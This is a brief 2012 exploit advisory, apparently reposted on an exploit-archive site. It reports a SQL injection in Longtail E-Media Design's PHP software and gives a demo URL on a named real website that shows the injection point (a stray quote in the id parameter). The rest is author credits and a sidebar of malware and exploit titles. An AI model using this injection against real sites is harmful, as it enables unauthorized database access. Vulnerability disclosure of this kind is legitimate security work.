Longtail E-Media Design SQL Injection

Posted on 08 March 2012

# Exploit Title: Longtail E-media Design SQL Injection Vulnerability
# Date: 07/03/2012
# Author: 3spi0n
# Software Website: http://www.longtail.info/
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable File:

[~] inners.php

[$] Demo ;

www.nast.org.np/inner.php?page=newsdetail&id=2' [MySQLi]

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

# Dar bi Koridor Benimki, Kendimi Aradigim.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne

# Official Blog ; www.Ryuzaki.in

# Greetz : Grayhatz.Co

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

- Mr.PaPaRoSSe And 3spi0n -

Bug Researcher Group - TURKEY

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Rocket LMS 1.9 Cross Site Scripting
PopojiCMS 2.0.1 Remote Command Execution
Backdrop CMS 1.27.1 Remote Command Execution
Apache OFBiz 18.12.12 Directory Traversal
WordPress XStore Theme 9.3.8 SQL Injection

Last 20